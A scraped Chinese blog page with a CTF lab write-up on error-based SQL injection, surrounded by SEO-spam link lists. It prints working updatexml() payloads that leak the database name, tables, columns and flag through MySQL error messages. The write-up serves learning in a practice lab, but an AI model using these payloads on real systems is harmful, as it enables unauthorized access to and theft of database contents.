当前位置: 首页 > news >正文

建网站程序工具块链友情链接平台

建网站程序工具,块链友情链接平台,渭南免费做网站,平凉网站建设平凉进入靶场 按照提示输入1 显示查询正确 既然是报错注入,先判断整形还是字符型注入 先输入1 and 11 再输入1 and 12 都显示查询正确,可知此为字符串型注入,不是数字型注入 然后就不会了 求助AI和其他wp 由以上2张搜索结果知updatexml是适用…

进入靶场

按照提示输入1

显示查询正确

既然是报错注入,先判断整形还是字符型注入

先输入1 and 1=1

再输入1 and 1=2

都显示查询正确,可知此为字符串型注入,不是数字型注入

然后就不会了

求助AI和其他wp

由以上2张搜索结果知updatexml是适用于字府串型注入的函数,且知道大概用法,开始注入

爆出库名          1 and updatexml(1,concat(0x7e,database()),3)

爆出表名                 1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='sqli')),3)

爆出字段名           1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='flag')),3)

 并没有显示字段名,添加了库名后才显示,应该是含有多个flag表,添加库名缩小了范围便显示出来了

1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='flag')),3)

爆出字段内容        1 and updatexml(1,concat(0x7e,(select group_concat(flag)from sqli.flag)),3)

得到flag

笔记

1,报错注入先判断是字府串型注入还是数字注入

2,判断出类型便可运用相关函数

3,updatexml函数

 1 and updatexml(1,concat(0x7e,database()),3)

第一个与第三个参数随便写,因为我们并不用它,参数2处的concat 是一个用于连接字符串的函数,0x7e代表16进制,避免特殊字符造成的错误

http://www.tj-hxxt.cn/news/67542.html

相关文章:

  • word模板免费网站百度搜索引擎的优缺点
  • 商机互联公司做网站怎么样百度网盘下载慢
  • 怎样把已经有的网站做推广黑锋网seo
  • 网站建设微站山西seo和网络推广
  • 如何制作手机购物网站百度推广开户费用标准
  • 免费全能浏览器深圳网站优化排名
  • 潍坊哪家网站制作公司好seo推广方法有哪些
  • 实体服务器做网站seo网络科技有限公司
  • 做兼职靠谱的网站有哪些泰州百度seo
  • 建设互联网站的目的一键制作网站
  • 中国电力建设股份有限公司官方网站商丘seo推广
  • 上海网校排名青岛seo结算
  • 南通网站开发培训机构营业执照如何办理
  • 给别人做网站的公司google 谷歌
  • 免费图纸网站电商网站seo优化
  • 环保网站建设的主题芭蕉视频app无限次数
  • 抓取的网站如何做seo巨量引擎广告投放
  • devexpress 网站开发西安网络推广seo0515
  • 网站充值链接怎么做怎么提高百度搜索排名
  • 福州网站外包鄂州网站seo
  • 怎么把自己网站推广出去网上推广的平台有哪些
  • 织梦做企业网站教程优书网首页
  • 广东网站建设色盲测试图
  • 岳阳公司网站开发百度如何购买关键词
  • 深圳网站制作搜行者seo网上卖货的平台有哪些
  • 网站开发助手seo排名优化方法
  • 傻瓜式 建网站2345网址导航怎么下载
  • 商城网站建设哪家公司好常见的网络推广方法
  • 网站做定向的作用大型集团网站建设公司
  • 看房子建设进度的网站app拉新任务平台